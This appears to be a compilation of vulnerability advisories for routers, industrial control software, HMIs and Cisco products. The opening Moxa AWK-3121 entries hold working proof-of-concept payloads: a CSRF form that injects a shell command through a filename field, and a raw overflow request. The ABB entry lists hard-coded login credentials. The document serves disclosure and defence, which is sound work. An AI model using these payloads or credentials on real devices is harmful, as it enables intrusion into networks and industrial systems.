------------------------------------------ [Additional Information] POC <html <body <script function submitRequest() { var formData = new FormData(); formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1"); // HTML file input, chosen by user formData.append("certFile1", "test.txt"); // JavaScript file-like object var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file... var blob = new Blob([content], { type: "text/xml"}); formData.append("certFile", blob); var request = new XMLHttpRequest(); request.open("POST", "http://192.168.127.253/forms/web_certUpload"); request.send(formData); } </script <form action="#" <input type="submit" value="Submit request" onclick="submitRequest();" / </form </body </html ------------------------------------------ [VulnerabilityType Other] Command injection in web runscript functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 14. By crafting a packet that contains a string of 480 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628 ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="XXXX" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" AAAAAAAAAAAAAAAAAA (etc.) ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley

Panasonic FPWIN Pro version 7.3.0.0 and prior allows attacker-created project files to be loaded by an authenticated user causing heap-based buffer overflows, which may lead to remote code execution. Panasonic FPWIN Pro Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PRO files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Failed exploits may result in denial-of-service conditions. Panasonic FPWIN Pro Version 7.3.0.0 and prior versions are vulnerable; other versions may also be affected

Panasonic FPWIN Pro version 7.3.0.0 and prior allows attacker-created project files to be loaded by an authenticated user triggering incompatible type errors because the resource does not have expected properties. This may lead to remote code execution. Panasonic FPWIN Pro Contains an illegal type conversion vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Panasonic Control FPWin Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PRO files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the process. Failed exploits may result in denial-of-service conditions. Panasonic FPWIN Pro Version 7.3.0.0 and prior versions are vulnerable; other versions may also be affected

An issue was discovered on Linksys WRT1900ACS 1.0.3.187766 devices. A lack of encryption in how the user login cookie (admin-auth) is stored on a victim's computer results in the admin password being discoverable by a local attacker, and usable to gain administrative access to the victim's router. The admin password is stored in base64 cleartext in an "admin-auth" cookie. An attacker sniffing the network at the time of login could acquire the router's admin password. Alternatively, gaining physical access to the victim's computer soon after an administrative login could result in compromise. Linksys WRT1900ACS The device contains cryptographic vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linksys WRT1900ACS is a wireless router from Linksys. In Linksys WRT1900ACS version 1.0.3.187766, there is an encryption vulnerability in the storage method of user login key. The vulnerability stems from incorrect use of relevant cryptographic algorithms by network systems or products, resulting in improperly encrypted content, weak encryption, and storing sensitive information in plain text

vtiger CRM 7.0.1 is affected by one reflected Cross-Site Scripting (XSS) vulnerability affecting version 7.0.1 and probably prior versions. This vulnerability could allow remote unauthenticated attackers to inject arbitrary web script or HTML via index.php?module=Contacts&view=List (app parameter). vtiger CRM Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

SoMachine HVAC is PLC programming software. SoMachine HVAC has dll hijacking vulnerability when processing ppjs and ppjx files. Attackers can use this vulnerability to load malicious dlls and execute malicious code

Xiaomi Mi 5s Plus devices allow attackers to trigger touchscreen anomalies via a radio signal between 198 kHz and 203 kHz, as demonstrated by a transmitter and antenna hidden just beneath the surface of a coffee-shop table, aka Ghost Touch. Xiaomi Mi 5s Plus Devices have vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. Xiaomi Mi 5s Plus is a smartphone of China Xiaomi Technology (Xiaomi). There is a security hole in Xiaomi Mi 5s Plus. Attackers can use the wireless signal between 198 kHz and 203 kHz to exploit this vulnerability to cause anomalies in the touch screen

On SOYAL AR-727H and AR-829Ev5 devices, all CGI programs allow unauthenticated POST access. SOYAL AR-727H and AR-829Ev5 The device contains an authentication vulnerability.Information may be tampered with. SOYAL AR-727H and SOYAL AR-829E are both display-type access controllers produced by China Taiwan SOYAL Company. Authorization issue vulnerabilities exist in SOYAL AR-727H and AR-829E. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products

A vulnerability in the BIOS upgrade utility of Cisco Unified Computing System (UCS) C-Series Rack Servers could allow an authenticated, local attacker to install compromised BIOS firmware on an affected device. The vulnerability is due to insufficient validation of the firmware image file. An attacker could exploit this vulnerability by executing the BIOS upgrade utility with a specific set of options. A successful exploit could allow the attacker to bypass the firmware signature-verification process and install compromised BIOS firmware on an affected device. Cisco Unified Computing System (UCS) C-Series Rack Server Contains vulnerabilities related to insufficient validation of data reliability.Information may be tampered with. Cisco Unified Computing System Central Software is prone to a security-bypass Vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This issue being tracked by Cisco Bug IDs CSCvp12824, CSCvp12840

The ABB HMI components implement hidden administrative accounts that are used during the provisioning phase of the HMI interface. These credentials allow the provisioning tool "Panel Builder 600" to flash a new interface and Tags (MODBUS coils) mapping to the HMI. These credentials are the idal123 password for the IdalMaster account, and the exor password for the exor account. These credentials are used over both HTTP(S) and FTP. There is no option to disable or change these undocumented credentials. An attacker can use these credentials to login to ABB HMI to read/write HMI configuration files and also to reset the device. This affects ABB CP635 HMI, CP600 HMIClient, Panel Builder 600, IDAL FTP server, IDAL HTTP server, and multiple other HMI components. ABB HMI The component contains a vulnerability involving the use of hard-coded credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. ABBPB610 is a software designed by ABB of Switzerland for the graphical user interface of the CP600 control panel platform. Multiple ABB Products are prone to a hard-coded credentials vulnerability. An attacker can exploit this issue to gain unauthorized access to the affected application, obtain sensitive information, cause denial-of-service conditions or execute arbitrary code on the affected system. The following products and versions are affected: ABB CP620 with firmware version 1.76 and earlier; ABB CP620-Web with firmware version 1.76 and earlier; ABB CP630 with firmware version 1.76 and earlier; ABB CP630-Web with firmware version 1.76 and earlier ; ABB CP635 with firmware version 1.76 and earlier; ABB CP635-B with firmware version 1.76 and earlier; ABB CP635-Web with firmware version 1.76 and earlier; ABB PB610 with firmware version 1.91 to 2.8.0.3674; ABB CP651-Web with firmware version 1.76 and earlier; ABB CP661 with firmware version 1.76 and earlier; ABB CP661-Web with firmware version 1.76 and earlier; ABB CP665-Web with firmware version 1.76 and earlier; ABB CP665 with firmware version 1.76 and earlier; ABB CP676-Web with firmware version 1.76 and earlier; ABB CP676 with firmware version 1.76 and earlier; ABB CP651 with firmware version 1.76 and earlier. Combining these actions can push malicious configuration and HMI code to the device. Affected systems ---------------- CP620, order code: 1SAP520100R0001, revision index G1 with BSP UN31 V1.76 and prior CP620, order code: 1SAP520100R4001, revision index G1 with BSP UN31 V1.76 and prior CP620-WEB, order code: 1SAP520200R0001, revision index G1 with BSP UN31 V1.76 and prior CP630, order code: 1SAP530100R0001, revision index G1 with BSP UN31 V1.76 and prior CP630-WEB, order code: 1SAP530200R0001, revision index G1 with BSP UN31 V1.76 and prior CP635, order code: 1SAP535100R0001, revision index G1 with BSP UN31 V1.76 and prior CP635, order code: 1SAP535100R5001, revision index G1 with BSP UN31 V1.76 and prior CP635-B, order code: 1SAP535100R2001, revision index G1 with BSP UN31 V1.76 and prior CP635-WEB, order code: 1SAP535200R0001, revision index G1 with BSP UN31 V1.76 and prior PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.3674CP651, order code: 1SAP551100R0001, revision index B1 with BSPUN30 V1.76 and prior CP651-WEB, order code: 1SAP551200R0001, revision index A0 with BSP UN30 V1.76 and prior CP661, order code: 1SAP561100R0001, revision index B1 with BSP UN30 V1.76 and prior CP661-WEB, order code: 1SAP561200R0001, revision index A0 with BSP UN30 V1.76 and prior CP665, order code: 1SAP565100R0001, revision index B1 with BSP UN30 V1.76 and prior CP665-WEB, order code: 1SAP565200R0001, revision index A0 with BSP UN30 V1.76 and prior CP676, order code: 1SAP576100R0001, revision index B1 with BSP UN30 V1.76 and prior CP676-WEB, order code: 1SAP576200R0001, revision index A0 with BSP UN30 V1.76 and prior Solution -------- Apply the patches or changes recommended by the vendor in their vulnerability advisories: - ABB CP635 HMI - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010376&LanguageCode=en&DocumentPartId=&Action=Launch - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch - ABB CP651 HMI - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010402&LanguageCode=en&DocumentPartId=&Action=Launch Disclosure timeline ------------------- 04/02/2019 - Contacted ABB requesting disclosure coordination 05/02/2019 - Provided vulnerability details 05/06/2019 - Patch available 17/06/2019 - xen1thLabs public disclosure

A vulnerability in the Secure Shell (SSH) authentication function of Cisco IOS XR Software could allow an authenticated, remote attacker to successfully log in to an affected device using two distinct usernames. The vulnerability is due to a logic error that may occur when certain sequences of actions are processed during an SSH login event on the affected device. An attacker could exploit this vulnerability by initiating an SSH session to the device with a specific sequence that presents the two usernames. A successful exploit could result in logging data misrepresentation, user enumeration, or, in certain circumstances, a command authorization bypass. See the Details section for more information. Cisco IOS XR There is an authorization vulnerability in the software.Information may be obtained and information may be altered. An attacker can exploit this issue to gain unauthorized access, perform unintended actions and cause denial-of-service conditions. This may lead to further attacks. This issue is being tracked by Cisco Bug ID CSCvo03672. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products

A vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&amp;P) Service, Cisco TelePresence Video Communication Server (VCS), and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient controls for specific memory operations. An attacker could exploit this vulnerability by sending a malformed Extensible Messaging and Presence Protocol (XMPP) authentication request to an affected system. A successful exploit could allow the attacker to cause an unexpected restart of the authentication service, preventing users from successfully authenticating. Exploitation of this vulnerability does not impact users who were authenticated prior to an attack. Multiple Cisco Products are prone to a denial-of-service vulnerability. This issue is being tracked by Cisco Bug IDs CSCvn00361, CSCvp51956. Cisco Expressway Series, etc. are all products of Cisco (Cisco). The vulnerability stems from the failure of the network system or product to properly validate the input data

A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device. For more information about CSRF attacks and potential mitigations, see Understanding Cross-Site Request Forgery Threat Vectors. Cisco Industrial Network Director is prone to a cross-site request-forgery vulnerability. This issue is being tracked by Cisco bug ID CSCvm30050. The system realizes automatic management through visual operation of industrial Ethernet infrastructure. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user

A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks. The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This issue is being tracked by Cisco Bug ID CSCvm22833. The system realizes automatic management through visual operation of industrial Ethernet infrastructure. The vulnerability stems from the lack of correct validation of client data in WEB applications

A vulnerability in the web-based management interface of Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to access sensitive system information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending a malicious request to an affected device. A successful exploit could allow the attacker to access sensitive system information. Cisco Webex Meetings Server Contains an information disclosure vulnerability.Information may be obtained. This issue is being tracked by Cisco bug ID CSCvn76141. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in the WebEx conference solution. This vulnerability stems from configuration errors in network systems or products during operation

plural Marvell SSD Controller The device contains vulnerabilities related to security functions.Information may be tampered with. Marvell SSD Controller 88SS1074 is a solid-state hard drive controller from Marvell. This vulnerability is due to the lack of security measures such as authentication, access control, and rights management in network systems or products. The following products and versions are affected: Marvell SSD Controller 88SS1074 ; 88SS1079 ; 88SS1080 ; 88SS1093 ; 88SS1092 ; 88SS1095 ; 88SS9174 ; 88SS9175 ; 88SS9187 ; 88SS9188 ; 88SS9189 ; 88SS9190 ; 88SS1085 ; 88SS1087 ; 88SS1090 ; 88SS1100 ; 88SS1084 ; 88SS1088 ; 88SS1098

A vulnerability in Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series software could allow an unauthenticated, remote attacker to cause an affected system to send arbitrary network requests. The vulnerability is due to improper restrictions on network services in the affected software. An attacker could exploit this vulnerability by sending malicious requests to the affected system. A successful exploit could allow the attacker to send arbitrary network requests sourced from the affected system. Multiple Cisco Products are prone to an security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Cisco Bug ID CSCvj33774